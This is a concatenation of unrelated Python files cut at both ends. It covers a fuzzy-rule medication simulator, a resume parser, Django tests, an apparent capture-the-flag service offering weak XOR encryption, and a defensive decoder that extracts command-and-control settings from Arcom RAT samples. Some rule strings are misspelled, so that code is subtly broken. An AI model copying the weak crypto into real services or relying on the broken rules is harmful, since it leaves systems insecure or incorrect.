{'plaqueta':'media'}, destination='plaqueta', then=('increase','low'))) actions_rules.append(Rule( {'plaqueta':'baja'}, destination='plaqueta', then=('increase','medium'))) actions_rules.append(Rule( {'plaqueta':'alta'}, destination='plaqueta', then=('increse','low'))) return actions_rules def jarabe_action(time: int, env: Environment) -> list[Rule]: r = random() actions_rules = [] if r < 1: if env.get_parameter('tos') != None and env.get_parameter('tos').value>=15: actions_rules.append(Rule( {'tos':'baja'}, destination='tos', then=('decrease','low'))) actions_rules.append(Rule( {'tos':'media'}, destination='tos', then=('decrease','high'))) actions_rules.append(Rule( {'tos':'alta'}, destination='tos', then=('decrease','high'))) return actions_rules def antibiotico_action(time: int, env: Environment) -> list[Rule]: r = random() actions_rules = [] if r < 1: if env.get_parameter('temperatura') != None and env.get_parameter('temperatura').value>38: actions_rules.append(Rule( {'temperatura':'baja'}, destination='temperatura', then=('decrease','low'))) actions_rules.append(Rule( {'temperatura':'media'}, destination='temperatura', then=('decrease','low'))) actions_rules.append(Rule( {'temperatura':'alta'}, destination='temperatura', then=('decrease','medium'))) actions_rules.append(Rule( {'temperatura':'muy alta'}, destination='temperatura', then=('decrease','high'))) if env.get_parameter('tos') != None and env.get_parameter('tos').value>=22: actions_rules.append(Rule( {'tos':'baja'}, destination='tos', then=('decrease','low'))) actions_rules.append(Rule( {'tos':'media'}, destination='tos', then=('decrease','medium'))) actions_rules.append(Rule( {'tos':'alta'}, destination='tos', then=('decrease','high'))) return actions_rules def plaquetol_action(time: int, env: Environment) -> list[Rule]: r = random() actions_rules = [] if r < 1: actions_rules.append(Rule( {'plaqueta':'media'}, destination='plaqueta', then=('increase','low'))) actions_rules.append(Rule( {'plaqueta':'baja'}, destination='plaqueta', then=('increase','medium'))) actions_rules.append(Rule( {'plaqueta':'alta'}, destination='plaqueta', then=('decrese','low'))) return actions_rulesmeiwanlanjun/knowledge-repoknowledge_repo/app/deploy/__init__.py1-10 import logging from .common import KnowledgeDeployer, get_app_builder # The following subclasses of KnowledgeDeployer must be imported in order to be registered as a deployer and hence # made accessible using `KnowledgeDeployer.using(..)`. from .flask import FlaskDeployer from .uwsgi import uWSGIDeployer # Wrap the gunicorn deployer in a try/except block, as it has a hard dependency on gunicorn which does not work on # non-POSIX systems, or if it is not installed. try: from .gunicorn import GunicornDeployer except: logging.warn("Gunicorn deployer is not available. It only works on POSIX " "platforms (e.g. Linux, Mac OS X, etc. If you are using a " "POSIX platform, please ensure that `gunicorn` is installed.") recruiter/parseprofile.py #!/usr/bin/env python import nltk, os, subprocess, code, glob, re, traceback, sys, inspect from time import clock, sleep from pprint import pprint import json import zipfile # import ner from .convertPDFToText import convertPDFToText from .convertDocxToText import convertDocxToText from django.core.files.storage import FileSystemStorage #from convertRtfToText import convertRtfToText class exportToCSV: def __init__(self, fileName='resultsCSV.txt', resetFile=False): headers = ['FILE NAME', 'NAME', 'EMAIL1', 'EMAIL2', 'EMAIL3', 'EMAIL4', 'PHONE1', 'PHONE2', 'PHONE3', 'PHONE4', 'INSTITUTES1','YEARS1', 'INSTITUTES2','YEARS2', 'INSTITUTES3','YEARS3', 'INSTITUTES4','YEARS4', 'INSTITUTES5','YEARS5', 'EXPERIENCE', 'DEGREES', ] if not os.path.isfile(fileName) or resetFile: # Will create/reset the file as per the evaluation of above condition fOut = open(fileName, 'w') fOut.close() fIn = open(fileName) ########### Open file if file already present inString = fIn.read() fIn.close() if len(inString) <= 0: ######### If File already exsists but is empty, it adds the header fOut = open(fileName, 'w') fOut.write(','.join(headers)+'\n') fOut.close() def write(self, infoDict): fOut = open('resultsCSV.txt', 'a+') # Individual elements are dictionaries writeString = '' try: writeString += str(infoDict['fileName']) + ',' writeString += str(infoDict['name']) + ',' if infoDict['email']: writeString += str(','.join(infoDict['email'][:4])) + ',' if len(infoDict['email']) < 4: writeString += ','*(4-len(infoDict['email'])) if infoDict['phone']: writeString += str(','.join(infoDict['phone'][:4])) + ',' if len(infoDict['phone']) < 4: writeString += ','*(4-len(infoDict['phone'])) writeString += str(infoDict['%sinstitute'%'c\\.?a'])+"," writeString +=str(infoDict['%syear'%'c\\.?a'])+"," writeString += str(infoDict['%sinstitute'%'b\\.?com'])+"," writeString +=str(infoDict['%syear'%'b\\.?com'])+"," writeString += str(infoDict['%sinstitute'%'icwa'])+"," writeString +=str(infoDict['%syear'%'icwa'])+"," writeString += str(infoDict['%sinstitute'%'m\\.?com'])+"," writeString +=str(infoDict['%syear'%'m\\.?com'])+"," writeString += str(infoDict['%sinstitute'%'mba'])+"," writeString +=str(infoDict['%syear'%'mba'])+"," writeString += str(infoDict['experience']) + ',' writeString += str(infoDict['degree']) + '\n' # For the remaining elements fOut.write(writeString) except: fOut.write('FAILED_TO_WRITE\n') fOut.close() class Parse(): # List (of dictionaries) that will store all of the values # For processing purposes information=[] inputString = '' tokens = [] lines = [] sentences = [] def __init__(self,filename, verbose=False): print('Starting Programme') fields = ["name", "address", "email", "phone", "mobile", "telephone", "residence status","experience","degree","cainstitute","cayear","caline","b.cominstitute","b.comyear","b.comline","icwainstitue","icwayear","icwaline","m.cominstitute","m.comyear","m.comline","mbainstitute","mbayear","mbaline"] # Glob module matches certain patterns doc_files = glob.glob("resumes/*.doc") docx_files = glob.glob("resumes/*.docx") pdf_files = glob.glob("resumes/*.pdf") rtf_files = glob.glob("resumes/*.rtf") text_files = glob.glob("resumes/*.txt") #files = set(doc_files + docx_files + pdf_files + rtf_files + text_files) #files = list(files) files = list(filename) print("filename ",filename) #print ("%d files identified" %len(files)) #for f in files: #print("Reading File %s"%f) # info is a dictionary that stores all the data obtained from parsing info = {} self.inputString, info['extension'] = self.readFile("files/"+filename) print("input",self.inputString) info['fileName'] = filename self.tokenize(self.inputString) self.getEmail(self.inputString, info) self.getPhone(self.inputString, info) self.getName(self.inputString, info) self.Qualification(self.inputString,info) self.getExperience(self.inputString,info,debug=False) #csv=exportToCSV() #csv.write(info) self.information.append(info) print (info) def readFile(self, fileName): ''' Read a file given its name as a string. Modules required: os UNIX packages required: antiword, ps2ascii ''' extension = fileName.split(".")[-1] if extension == "txt": f = open(fileName, 'r') string = f.read() f.close() return string, extension elif extension == "doc": # Run a shell command and store the output as a string # Antiword is used for extracting data out of Word docs. Does not work with docx, pdf etc. return subprocess.Popen(['antiword', fileName], stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()[0], extension elif extension == "docx": try: return convertDocxToText(fileName), extension except: return '' pass #elif extension == "rtf": # try: # return convertRtfToText(fileName), extension # except: # return '' # pass elif extension == "pdf": # ps2ascii converst pdf to ascii text # May have a potential formatting loss for unicode characters # return os.system(("ps2ascii %s") (fileName)) print("from pdf") try: return convertPDFToText(fileName), extension except: return '' pass else: print('Unsupported format') return '', '' def preprocess(self, document): ''' Information Extraction: Preprocess a document with the necessary POS tagging. Returns three lists, one with tokens, one with POS tagged lines, one with POS tagged sentences. Modules required: nltk ''' try: # Try to get rid of special characters try: document = document.decode('ascii', 'ignore') except: document = document.encode('ascii', 'ignore') # Newlines are one element of structure in the data # Helps limit the context and breaks up the data as is intended in resumes - i.e., into points lines = [el.strip() for el in document.split("\n") if len(el) > 0] # Splitting on the basis of newlines lines = [nltk.word_tokenize(el) for el in lines] # Tokenize the individual lines lines = [nltk.pos_tag(el) for el in lines] # Tag them # Below approach is slightly different because it splits sentences not just on the basis of newlines, but also full stops # - (barring abbreviations etc.) # But it fails miserably at predicting names, so currently using it only for tokenization of the whole document sentences = nltk.sent_tokenize(document) # Split/Tokenize into sentences (List of strings) sentences = [nltk.word_tokenize(sent) for sent in sentences] # Split/Tokenize sentences into words (List of lists of strings) tokens = sentences sentences = [nltk.pos_tag(sent) for sent in sentences] # Tag the tokens - list of lists of tuples - each tuple is (, ) # Next 4 lines convert tokens from a list of list of strings to a list of strings; basically stitches them together dummy = [] for el in tokens: dummy += el tokens = dummy # tokens - words extracted from the doc, lines - split only based on newlines (may have more than one sentence) # sentences - split on the basis of rules of grammar return tokens, lines, sentences except Exception as e: print(e) def tokenize(self, inputString): try: self.tokens, self.lines, self.sentences = self.preprocess(inputString) return self.tokens, self.lines, self.sentences except Exception as e: print(e) def getEmail(self, inputString, infoDict, debug=False): ''' Given an input string, returns possible matches for emails. Uses regular expression based matching. Needs an input string, a dictionary where values are being stored, and an optional parameter for debugging. Modules required: clock from time, code. ''' email = None try: pattern = re.compile(r'\S*@\S*') matches = pattern.findall(inputString) # Gets all email addresses as a list email = matches except Exception as e: print(e) infoDict['email'] = email if debug: print("\n", pprint(infoDict), "\n") code.interact(local=locals()) return email def getPhone(self, inputString, infoDict, debug=False): ''' Given an input string, returns possible matches for phone numbers. Uses regular expression based matching. Needs an input string, a dictionary where values are being stored, and an optional parameter for debugging. Modules required: clock from time, code. ''' number = None try: pattern = re.compile(r'([+(]?\d+[)\-]?[ \t\r\f\v]*[(]?\d{2,}[()\-]?[ \t\r\f\v]*\d{2,}[()\-]?[ \t\r\f\v]*\d*[ \t\r\f\v]*\d*[ \t\r\f\v]*)') # Understanding the above regex # +91 or (91) -> [+(]? \d+ -? # Metacharacters have to be escaped with \ outside of character classes; inside only hyphen has to be escaped # hyphen has to be escaped inside the character class if you're not incidication a range # General number formats are 123 456 7890 or 12345 67890 or 1234567890 or 123-456-7890, hence 3 or more digits # Amendment to above - some also have (0000) 00 00 00 kind of format # \s* is any whitespace character - careful, use [ \t\r\f\v]* instead since newlines are trouble match = pattern.findall(inputString) # match = [re.sub(r'\s', '', el) for el in match] # Get rid of random whitespaces - helps with getting rid of 6 digits or fewer (e.g. pin codes) strings # substitute the characters we don't want just for the purpose of checking match = [re.sub(r'[,.]', '', el) for el in match if len(re.sub(r'[()\-.,\s+]', '', el))>6] # Taking care of years, eg. 2001-2004 etc. match = [re.sub(r'\D$', '', el).strip() for el in match] # $ matches end of string. This takes care of random trailing non-digit characters. \D is non-digit characters match = [el for el in match if len(re.sub(r'\D','',el)) <= 15] # Remove number strings that are greater than 15 digits try: for el in list(match): # Create a copy of the list since you're iterating over it if len(el.split('-')) > 3: continue # Year format YYYY-MM-DD for x in el.split("-"): try: # Error catching is necessary because of possibility of stray non-number characters # if int(re.sub(r'\D', '', x.strip())) in range(1900, 2100): if x.strip()[-4:].isdigit(): if int(x.strip()[-4:]) in range(1900, 2100): # Don't combine the two if statements to avoid a type conversion error match.remove(el) except: pass except: pass number = match except: pass infoDict['phone'] = number if debug: print("\n", pprint(infoDict), "\n") code.interact(local=locals()) return number def getName(self, inputString, infoDict, debug=False): ''' Given an input string, returns possible matches for names. Uses regular expression based matching. Needs an input string, a dictionary where values are being stored, and an optional parameter for debugging. Modules required: clock from time, code. ''' # Reads Indian Names from the file, reduce all to lower case for easy comparision [Name lists] indianNames = open("files/allNames.txt", "r").read().lower() # Lookup in a set is much faster indianNames = set(indianNames.split()) otherNameHits = [] nameHits = [] name = None try: # tokens, lines, sentences = self.preprocess(inputString) tokens, lines, sentences = self.tokens, self.lines, self.sentences # Try a regex chunk parser # grammar = r'NAME: {|}' grammar = r'NAME: {*}' # Noun phrase chunk is made out of two or three tags of type NN. (ie NN, NNP etc.) - typical of a name. {2,3} won't work, hence the syntax # Note the correction to the rule. Change has been made later. chunkParser = nltk.RegexpParser(grammar) all_chunked_tokens = [] for tagged_tokens in lines: # Creates a parse tree if len(tagged_tokens) == 0: continue # Prevent it from printing warnings chunked_tokens = chunkParser.parse(tagged_tokens) all_chunked_tokens.append(chunked_tokens) for subtree in chunked_tokens.subtrees(): # or subtree.label() == 'S' include in if condition if required if subtree.label() == 'NAME': for ind, leaf in enumerate(subtree.leaves()): if leaf[0].lower() in indianNames and 'NN' in leaf[1]: # Case insensitive matching, as indianNames have names in lowercase # Take only noun-tagged tokens # Surname is not in the name list, hence if match is achieved add all noun-type tokens # Pick upto 3 noun entities hit = " ".join([el[0] for el in subtree.leaves()[ind:ind+3]]) # Check for the presence of commas, colons, digits - usually markers of non-named entities if re.compile(r'[\d,:]').search(hit): continue nameHits.append(hit) # Need to iterate through rest of the leaves because of possible mis-matches # Going for the first name hit if len(nameHits) > 0: nameHits = [re.sub(r'[^a-zA-Z \-]', '', el).strip() for el in nameHits] name = " ".join([el[0].upper()+el[1:].lower() for el in nameHits[0].split() if len(el)>0]) otherNameHits = nameHits[1:] except Exception as e: print(traceback.format_exc()) print(e) infoDict['name'] = name infoDict['otherNameHits'] = otherNameHits if debug: print("\n", pprint(infoDict), "\n") code.interact(local=locals()) return name, otherNameHits def getExperience(self,inputString,infoDict,debug=False): experience=[] try: for sentence in self.lines:#find the index of the sentence where the degree is find and then analyse that sentence sen=" ".join([words[0].lower() for words in sentence]) #string of words in sentence if re.search('experience',sen): sen_tokenised= nltk.word_tokenize(sen) tagged = nltk.pos_tag(sen_tokenised) entities = nltk.chunk.ne_chunk(tagged) for subtree in entities.subtrees(): for leaf in subtree.leaves(): if leaf[1]=='CD': experience=leaf[0] except Exception as e: print(traceback.format_exc()) print(e) if experience: infoDict['experience'] = experience else: infoDict['experience']=0 if debug: print("\n", pprint(infoDict), "\n") code.interact(local=locals()) return experience def getQualification(self,inputString,infoDict,D1,D2): #key=list(qualification.keys()) qualification={'institute':'','year':''} nameofinstitutes=open('files/nameofinstitutes.txt','r').read().lower()#open file which contains keywords like institutes,university usually fond in institute names nameofinstitues=set(nameofinstitutes.split()) instiregex=r'INSTI: {?+??}' chunkParser = nltk.RegexpParser(instiregex) try: index=[] line=[]#saves all the lines where it finds the word of that education for ind, sentence in enumerate(self.lines):#find the index of the sentence where the degree is find and then analyse that sentence sen=" ".join([words[0].lower() for words in sentence]) #string of words if re.search(D1,sen) or re.search(D2,sen): index.append(ind) #list of all indexes where word Ca lies if index:#only finds for Ca rank and CA year if it finds the word Ca in the document for indextocheck in index:#checks all nearby lines where it founds the degree word.ex-'CA' for i in [indextocheck,indextocheck+1]: #checks the line with the keyword and just the next line to it try: try: wordstr=" ".join(words[0] for words in self.lines[i])#string of that particular line except: wordstr="" #if re.search(r'\D\d{1,3}\D',wordstr.lower()) and qualification['rank']=='': #qualification['rank']=re.findall(r'\D\d{1,3}\D',wordstr.lower()) #line.append(wordstr) if re.search(r'\b[21][09][8901][0-9]',wordstr.lower()) and qualification['year']=='': qualification['year']=re.findall(r'\b[21][09][8901][0-9]',wordstr.lower()) line.append(wordstr) chunked_line = chunkParser.parse(self.lines[i])#regex chunk for searching univ name for subtree in chunked_line.subtrees(): if subtree.label()=='INSTI': for ind,leaves in enumerate(subtree): if leaves[0].lower() in nameofinstitutes and leaves[1]=='NNP' and qualification['institute']=='': qualification['institute']=' '.join([words[0]for words in subtree.leaves()]) line.append(wordstr) except Exception as e: print(traceback.format_exc()) if D1=='c\.?a': infoDict['%sinstitute'%D1] ="I.C.A.I" else: if qualification['institute']: infoDict['%sinstitute'%D1] = str(qualification['institute']) else: infoDict['%sinstitute'%D1] = "NULL" if qualification['year']: infoDict['%syear'%D1] = int(qualification['year'][0]) else: infoDict['%syear'%D1] =0 infoDict['%sline'%D1]=list(set(line)) except Exception as e: print(traceback.format_exc()) print(e) def Qualification(self,inputString,infoDict,debug=False): degre=[] #Q={'CAinformation':'','ICWAinformation':'','B.Cominformation':'','M.Cominformation':'','MBAinformation':''} #degree=[] #degree1=open('degree.txt','r').read().lower()#string to read from the txt file which contains all the degrees #degree=set(el for el in degree1.split('\n'))#saves all the degrees seperated by new lines,degree name contains both abbreviation and full names check file #qualification1={'CAline':'','CAcollege':'','CArank':'','CAyear':''} self.getQualification(self.inputString,infoDict,'c\.?a','chartered accountant') if infoDict['%sline'%'c\.?a']: degre.append('ca') self.getQualification(self.inputString,infoDict,'icwa','icwa') if infoDict['%sline'%'icwa']: degre.append('icwa') self.getQualification(self.inputString,infoDict,'b\.?com','bachelor of commerce') if infoDict['%sline'%'b\.?com']: degre.append('b.com') self.getQualification(self.inputString,infoDict,'m\.?com','masters of commerce') if infoDict['%sline'%'m\.?com']: degre.append('m.com') self.getQualification(self.inputString,infoDict,'mba','mba') if infoDict['%sline'%'mba']: degre.append('mba') if degre: infoDict['degree'] = degre else: infoDict['degree'] = "NONE" if debug: print("\n", pprint(infoDict), "\n") code.interact(local=locals()) return infoDict['degree'] if __name__ == "__main__": verbose = False if "-v" in str(sys.argv): verbose = True p = Parse(verbose) import sys from PyQt5.QtWidgets import * class Window(QWidget): def __init__(self): super().__init__() self.setWindowTitle("Using Labels") self.setGeometry(50,50,350,350) self.UI() def UI(self): text1=QLabel("Hello Python",self) text2=QLabel("Hello World",self) text1.move(50,50) text2.move(200,150) self.show() def main(): App = QApplication(sys.argv) window=Window() sys.exit(App.exec_()) if __name__ == '__main__': main()Rennty/x-proba # -*- coding: utf-8 -*- from app import create_app app = create_app() # Models from sxmodel.Users import User setup.py10-100 import os import re from setuptools import setup, find_packages with open(os.path.join('src', 'braceexpand', '__init__.py')) as f: version = re.findall(r"^__version__ = '(.*)'", f.read(), re.M)[0] with open('README.rst') as f: README = f.read() setup( name='braceexpand', version=version, author='', author_email='', url='https://github.com/trendels/braceexpand', license='MIT', description='Bash-style brace expansion for Python', long_description=README, classifiers = [ 'License :: OSI Approved :: MIT License', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 3', ], package_dir={'': 'src'}, packages=find_packages('src'), include_package_data=True, install_requires=[ 'typing;python_version<"3.5"' ], ) from django.test import TestCase from rest_framework.test import APITestCase from rest_framework import status from .models import Template class TemplateTest(APITestCase): fixtures = ['fixtures/user.json', 'fixtures/member.json', 'fixtures/progress.json'] def test_create_template(self): url = '/templates/' self.client.login(username='supervisor', password='') data = {'name': 'template biasa', 'description': 'template skripsi seperti biasanya'} response = self.client.post(url, data, format='json') self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content) data = {'name': 'template lainnya'} response = self.client.post(url, data, format='json') self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_update_template(self): url = '/templates/1/' self.client.login(username='supervisor', password='') data = {'name': 'template istimewa', 'description': 'template yang istimewa'} response = self.client.put(url, data, format='json') self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) data = {'name': 'template biasa aja'} response = self.client.put(url, data, format='json') self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) def test_delete_template(self): url = '/templates/1/' self.client.login(username='supervisor', password='') # data = {'name': 'template istimewa', 'description': 'template yang istimewa'} exist = Template.objects.filter(pk=1) self.assertEqual(exist.count(), 1) response = self.client.delete(url, format='json') self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT, response.content) exist = Template.objects.filter(pk=1) self.assertEqual(exist.count(), 0) class ThesisTest(APITestCase): fixtures = ['fixtures/user.json', 'fixtures/member.json'] def test_create_theses(self): url = '/theses/' data = {'topic': 'the topic', 'title': 'the tittle'} self.client.login(username='supervisor', password='') response = self.client.post(url, data, format='json') self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST) data = {'topic': 'the topic', 'title': 'the tittle', 'student': 2} response = self.client.post(url, data, format='json') self.assertEqual(response.status_code, status.HTTP_201_CREATED) class TaskTest(APITestCase): fixtures = ['fixtures/user.json', 'fixtures/member.json', 'fixtures/progress.json'] def test_create_task_for_student(self): url = '/tasks/' self.client.login(username='supervisor', password='') data = {'student': 'farhan', 'name': 'tugas baru', 'description': 'membuat tugas', 'duration': 5} response = self.client.post(url, data, format='json') self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_update_student_task(self): url = '/tasks/2/' self.client.login(username='supervisor', password='') data = {'name': 'tugas update', 'description': 'membuat tugas update', 'duration': 10} response = self.client.put(url, data, format='json') self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) self.assertEqual(response.data['name'], 'tugas update') def test_delete_student_task(self): url = '/tasks/2/' self.client.login(username='supervisor', password='') response = self.client.delete(url) self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT) def test_student_task(self): url = '/tasks/student_task/' self.client.login(username='supervisor', password='') response = self.client.get(url, format='json') self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) def test_comment_task(self): url = '/tasks/2/comment/' self.client.login(username='supervisor', password='') data = {'type': 'e', 'text': 'ayo dikerjakan'} response = self.client.post(url, data, format='json') self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content) def test_validate_task(self): url = '/tasks/2/validate/' self.client.login(username='supervisor', password='') response = self.client.put(url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) # from deeppavlov import cos_sim_classifier # print(cos_sim_classifier.__class__) from deeppavlov.models import logreg_classifier print(logreg_classifier.__class__)0 # All rights reserved by forest fairy. # You cannot modify or share anything without sacrifice. # If you don't agree, keep calm and don't look at code bellow! __author__ = "VirtualV " __date__ = "$Apr 13, 2014 12:30:05 AM$" import ast from tests.benchmarks.tools.base import App class CFBench(App): """CFBench""" def __init__(self, attributes, serial): App.__init__(self, attributes, serial) def collect_results(self, res_doc): res = ast.literal_eval(self.getResults()) for x in res: res_doc.add_name(x[0]) res_doc.add_result(x[1].replace('%', '')) services/qdb/server/handler.py from aiohttp import web from ciphers import aes, xor from protos import get_msg_pb2, logins_pb2, response_pb2, request_pb2, set_msg_pb2, utils_pb2 from utils import Gate, Qubit ALGOS = { utils_pb2.Algo.AES: aes, utils_pb2.Algo.XOR: xor } class Handler: def __init__(self, bb84, db): self._bb84 = bb84 self._db = db def _process_request(self, request): client_qubits = list(map(Qubit.from_protobuf, request.qubits[:])) client_gates = list(map(Gate.from_protobuf, request.gates[:])) server_gates = self._bb84.generate_basis() bits = self._bb84.recieve(client_qubits, server_gates) key = self._bb84.generate_key(server_gates, client_gates, bits) return server_gates, key async def ping(self, request): return web.Response(status=200) async def get_logins(self, request): request = request_pb2.Request().FromString(await request.read()) server_gates, key = self._process_request(request) algo = ALGOS[request.algo] response = response_pb2.Response() response.gates.extend([x.to_protobuf() for x in server_gates]) logins = [] for login in await self._db.get_logins(): logins.append(algo.encrypt(key, login)) response.option.Extensions[logins_pb2.LOGINS].name.extend(logins) return web.Response(body=response.SerializeToString()) async def set_msg(self, request): request = request_pb2.Request().FromString(await request.read()) server_gates, key = self._process_request(request) algo = ALGOS[request.algo] login = request.option.Extensions[set_msg_pb2.SET_MSG_REQUEST].login msg = request.option.Extensions[set_msg_pb2.SET_MSG_REQUEST].msg encrypted_msg = algo.encrypt(key, msg) if not await self._db.check_login(login): await self._db.set_msg(login, encrypted_msg) response = response_pb2.Response() response.gates.extend([x.to_protobuf() for x in server_gates]) set_msg_proto = response.option.Extensions[set_msg_pb2.SET_MSG_RESPONSE] set_msg_proto.msg = encrypted_msg return web.Response(body=response.SerializeToString()) else: return web.Response(status=400) async def get_msg(self, request): request = request_pb2.Request().FromString(await request.read()) server_gates, key = self._process_request(request) algo = ALGOS[request.algo] login = request.option.Extensions[get_msg_pb2.GET_MSG_REQUEST].login if await self._db.check_login(login): msg = await self._db.get_msg(login) encrypted_msg = algo.encrypt(key, msg) response = response_pb2.Response() response.gates.extend([x.to_protobuf() for x in server_gates]) get_msg_proto = response.option.Extensions[get_msg_pb2.GET_MSG_RESPONSE] get_msg_proto.msg = encrypted_msg return web.Response(body=response.SerializeToString()) else: return web.Response(status=400)malwareconfig/decoders/arcom.py from base64 import b64decode from malwareconfig import crypto from malwareconfig.common import Decoder from malwareconfig.common import string_printable class Arcom(Decoder): decoder_name = "Arcom" decoder__version = 1 decoder_author = "@kevthehermit" decoder_description = "Arcom RAT Decoder" def __init__(self): self.config = {} def get_config(self): ''' This is the main entry :return: ''' key = "" file_data = self.file_info.file_data coded_config = file_data.split(b"\x18\x12\x00\x00")[1][:-8] decoded_config = b64decode(coded_config) clear_config = crypto.decrypt_blowfish(key, decoded_config).decode('utf-8') config_dict = {} parts = clear_config.split('|') if len(parts) > 3: config_dict["Domain"] = parts[0] config_dict["Port"] = parts[1] config_dict["Install Path"] = parts[2] config_dict["Install Name"] = parts[3] config_dict["Startup Key"] = parts[4] config_dict["Campaign ID"] = parts[5] config_dict["Mutex Main"] = parts[6] config_dict["Mutex Per"] = parts[7] config_dict["YPER"] = parts[8] config_dict["YGRB"] = parts[9] config_dict["Mutex Grabber"] = parts[10] config_dict["Screen Rec Link"] = parts[11] config_dict["Mutex 4"] = parts[12] config_dict["YVID"] = parts[13] config_dict["YIM"] = parts[14] config_dict["NO"] = parts[15] config_dict["Smart Broadcast"] = parts[16] config_dict["YES"] = parts[17] config_dict["Plugins"] = parts[18] config_dict["Flag1"] = parts[19] config_dict["Flag2"] = parts[20] config_dict["Flag3"] = parts[21] config_dict["Flag4"] = parts[22] config_dict["WebPanel"] = parts[23] config_dict["Remote Delay"] = parts[24] # Set the config to the class for use self.config = config_dict # OpenWeatherMap API Key weather_api_key = "" # Google API Key g_key = "" # Copyright (c) 2021 University System of Georgia and janki contributors # Distributed under the terms of the BSD-3-Clause License. import json from pathlib import Path from typing import Text import jsonschema from ._version import __js__ HERE = Path(__file__).parent SCHEMA = ( HERE / "labextensions" / __js__["name"] / "schemas" / __js__["name"] / "plugin.json" ) REF = "$ref" ONE_OF = "oneOf" def make_validator( ref: Text = "#/definitions/api-collection", ) -> jsonschema.Draft7Validator: """return a schema from the source-of-truth, with an optional $ref""" schema = load_schema() schema.pop(ONE_OF, None) schema.pop(REF, None) schema[REF] = ref return jsonschema.Draft7Validator(schema) def load_schema(): return json.loads(SCHEMA.read_text(encoding="utf-8")) scripts/jpeg2tiff.py import cv2 # for i in ["Tumor", "TP53", "PTEN", "STK11", "KRAS", "NOTCH1"]: # image = cv2.imread("/Users/rh2740/Documents/pancan_imaging/DLCCA/Figures/Figure3-S3/{}/mosaic_0.jpeg".format(i)) # cv2.imwrite("/Users/rh2740/Documents/pancan_imaging/DLCCA/Figures/TIF/{}.tif".format(i, i), image) image = cv2.imread("/Users/rh2740/Documents/pancan_imaging/Results/immune/out/mosaic_2.jpeg") cv2.imwrite("/Users/rh2740/Documents/pancan_imaging/Results/immune/out/mosaic_2.tif", image) #-*- coding: utf_8 -*- # XXX/AAA.wav | AAA_1.wav "text1" # AAA_1.wav [0.0,1.2] | AAA_2.wav "text2" # AAA_2.wav [1.5,2.0] | BBB_1.wav "text3" # . | BBB_2.wav "text4" # XXX/BBB.wav | # BBB_1.wav [0.0,0.8] | # BBB_2.wav [1.1,1.9] | # . import os import sys import codecs FilterString=['', 'sil', 'noi', '*', 'music'] def filterTime(line): time = line[line.rfind('=')+1:] time = time.strip() return float(time[:time.find('.')+3]) def filterText(line): text = line[line.rfind('=')+1:] text = text.replace('"','') text = text.replace('。','') text = text.replace(' ','') text = text.strip() return text def transCodeType(sFile, sType, tFile, tType): fin = open(sFile, 'r') fout = open(tFile, 'w') text = fin.read().decode(sType) fout.write(text.encode(tType)) fin.close() fout.close() def ParseFile(curFile, fcout, ftout): count = 0 baseName = curFile[curFile.rfind('/')+1: curFile.rfind('.TextGrid')] pathName = 'XXX/%s.wav\n' % baseName fcout.write(pathName) transFile = '%s.TextGrid.bak' % baseName transCodeType(curFile, 'utf-16', transFile, 'utf-8') fin = open(transFile, 'r') while 1: line = fin.readline() if not line: break if line.find('item [2]') != -1: break if line.find('intervals [') != -1: line_xmin = fin.readline() line_xmax = fin.readline() line_text = fin.readline() xmin = filterTime(line_xmin) xmax = filterTime(line_xmax) text = filterText(line_text) if text in FilterString: continue count += 1 segWave = '%s_%d.wav [%f,%f]\n' % (baseName, count, xmin, xmax) segText = '%s_%d.wav %s\n' % (baseName, count, text) fcout.write(segWave) ftout.write(segText) fcout.write('.\n') fin.close() if os.path.exists(transFile): os.remove(transFile) if __name__ == '__main__': if len(sys.argv) != 4: print 'python %s inFileList outcutWavList outtrans' % sys.argv[0] sys.exit(1) if not os.path.exists(sys.argv[1]): print 'cannot find ', sys.argv[1] sys.exit(1) flist = open(sys.argv[1],'r') fcout = open(sys.argv[2],'w') ftout = open(sys.argv[3],'w') for curFile in flist: curFile = curFile.rstrip('\n') if not os.path.exists(curFile): print 'cannot find %s' % curFile continue ParseFile(curFile, fcout, ftout) flist.close() fcout.close() ftout.close() 0 from __future__ import print_function import _pickle as cPickle import os import sys import json import re sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) import utils period_strip = re.compile("(?!<=\d)(\.)(?!\d)") comma_strip = re.compile("(\d)(\,)(\d)") punct = [';', r"/", '[', ']', '"', '{', '}', '(', ')', '=', '+', '\\', '_', '-', '>', '<', '@', '`', ',', '?', '!'] def get_score(occurences): if occurences == 0: return 0 elif occurences == 1: return .3 elif occurences == 2: return .6 elif occurences == 3: return .9 else: return 1. def process_punctuation(inText): outText = inText for p in punct: if (p + ' ' in inText or ' ' + p in inText) \ or (re.search(comma_strip, inText) != None): outText = outText.replace(p, '') else: outText = outText.replace(p, ' ') outText = period_strip.sub("", outText, re.UNICODE) return outText def multiple_replace(text, wordDict): for key in wordDict: text = text.replace(key, wordDict[key]) return text def preprocess_answer(answer): answer = process_punctuation(answer) answer = answer.replace(',', '') return answer def get_answer_mode(answers): counts = {} for ans in answers: a = ans['answer'] counts[a] = counts.get(a, 0) + 1 max_count = 0 mode = None for c in counts: if max_count < counts[c]: max_count = counts[c] mode = c return mode def filter_answers(answers_dset, min_occurence): """This will change the answer to preprocessed version """ occurence = {} for ans_entry in answers_dset: answers = ans_entry['answers'] gtruth = get_answer_mode(answers) gtruth = preprocess_answer(gtruth) if gtruth not in occurence: occurence[gtruth] = set() img_id, _ = os.path.splitext(ans_entry['image']) occurence[gtruth].add(img_id) for answer in list(occurence): if len(occurence[answer]) < min_occurence: occurence.pop(answer) print('Num of answers that appear >= %d times: %d' % ( min_occurence, len(occurence))) return occurence def create_ans2label(occurence, name, cache_root='data/cache'): """Note that this will also create label2ans.pkl at the same time occurence: dict {answer -> whatever} name: prefix of the output file cache_root: str """ ans2label = {} label2ans = [] label = 0 for answer in 